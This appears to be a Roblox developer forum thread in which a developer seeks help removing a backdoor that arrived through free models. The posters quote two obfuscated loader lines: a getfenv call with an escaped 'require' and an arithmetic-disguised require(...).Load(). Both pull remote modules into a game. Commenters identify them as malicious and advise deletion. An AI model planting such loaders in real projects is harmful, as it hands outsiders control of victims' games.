Free Model Advets

getfenv()‘\114\101\113\117\105\114\101’

What’s their content? Does it seem to be something malicious?

This script come from studio, DO NOT REMOVE! and the thing I send
getfenv()[‘\114\101\113\117\105\114\101’] (4958213401)

Definitely, DEFINITELY malicious. Look for any other scripts that make sure these two scripts are there. Delete them too. This would be your cause, I’d say.

But I remove them! They come again when I reset the studio.

1 Like

And it prints Loaded :slight_smile:

I think that it’s too late now that the malware exists in his game. The only thing he can do is try recover what he can and move to a different place, avoiding free models where possible.
cc: @OptimalDidko

Like I said, make sure you look for any scripts that may check if those exist. Some scripts may hide code that ensures other malicious scripts’ existence, and if they don’t exist they may possibly use Instance.new to make it exist.

@OptimalDidko, I think having seen what I just read just before it makes the most sense for you is unfortunately to create a new game

Because all the script search techniques do not work, I believe that the scripts can also put this in an area where we cannot see them but I am not sure

Agreed, probably too late to salvage. You should take some assets that you need from the game and move to a new place.

cc @Med367367 @OptimalDidko

1 Like

Thank you all! I appreciate it.

2 Likes

Check your plugins. look at the posts in this post Ignoremodel_<number, 2343, 412> Virus in one of my plugins, can i have some help? - #5 by FastAsFlash_Dev

@OptimalDidko do u have this plugin ?
https://www.roblox.com/library/4958365277/UPDATED-Anti-Virus-Protect-Your-Game
100% backddor

Okay, this is worth talking about. Definitely check this @OptimalDidko

Hold on! I’ll try it! :slight_smile:

Have you seen anything suspicious about your scripts, like the number of lines (if it is more than the script codes require) or the scroll bars if the script and codes are hiding somewhere even the horizontal bar (we can create and hide codes in one line)?
I am wondering if it could be a module.

I just literally check EVERY script in the game.

I found this:
require(1643016165.67*3-0.01).Load()

Ok, delete this too probably. (30 chars)

I just found the virus, the thing you sent here is the virus. I think